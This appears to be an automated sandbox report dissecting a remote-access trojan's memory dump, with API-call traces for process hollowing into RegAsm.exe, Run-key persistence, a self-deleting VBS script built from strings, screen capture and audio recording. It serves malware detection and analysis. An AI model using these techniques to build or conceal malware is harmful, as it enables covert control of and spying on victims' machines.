                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                              • String ID:
                                                                                              • API String ID: 1663032902-0
                                                                                              • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                              • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                              • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                              • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                              Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 2692324296-0
                                                                                              • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                              • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                              • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                              • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                              Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                              • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1272433827-0
                                                                                              • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                              • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                              • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                              • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                              Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 1084509184-0
                                                                                              • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                              • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                              • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                              • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                              Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                              • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                              • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                              • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                              Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                              • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                              • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                              • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                              • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                              • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                              • GetIconInfo.USER32 ref: 00418FF8
                                                                                              • DeleteObject.GDI32(?), ref: 00419027
                                                                                              • DeleteObject.GDI32(?), ref: 00419034
                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                              • DeleteDC.GDI32(?), ref: 004191B7
                                                                                              • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                              • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                              • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                              • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                              • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                              • DeleteDC.GDI32(?), ref: 00419293
                                                                                              • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                              • String ID: DISPLAY
                                                                                              • API String ID: 479521175-865373369
                                                                                              • Opcode ID: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                                                              • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                              • Opcode Fuzzy Hash: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                                                              • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                              Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                              • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                              • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                              • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                              • GetLastError.KERNEL32 ref: 004184B5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                              • API String ID: 4188446516-3035715614
                                                                                              • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                              • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                              • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                              • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                                              Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                              • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                              • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                              • API String ID: 1861856835-1447701601
                                                                                              • Opcode ID: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                                                              • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                              • Opcode Fuzzy Hash: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                                                              • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                              Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                              • ExitProcess.KERNEL32 ref: 0040D454
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                              • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                              • API String ID: 3797177996-2483056239
                                                                                              • Opcode ID: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
                                                                                              • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                              • Opcode Fuzzy Hash: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
                                                                                              • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                              Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                              • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                              • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                              • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                              • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                              • API String ID: 2649220323-436679193
                                                                                              • Opcode ID: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                                                              • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                              • Opcode Fuzzy Hash: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                                                              • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                              Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                              • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                              • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                              • API String ID: 738084811-2094122233
                                                                                              • Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                                              • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                              • Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                                              • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                              Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Write$Create
                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                              • API String ID: 1602526932-4212202414
                                                                                              • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                              • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                              • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                              • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                              Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                              • API String ID: 1646373207-255920310
                                                                                              • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                              • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                              • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                              • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                              Function 0044F4AD Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 419COMMON
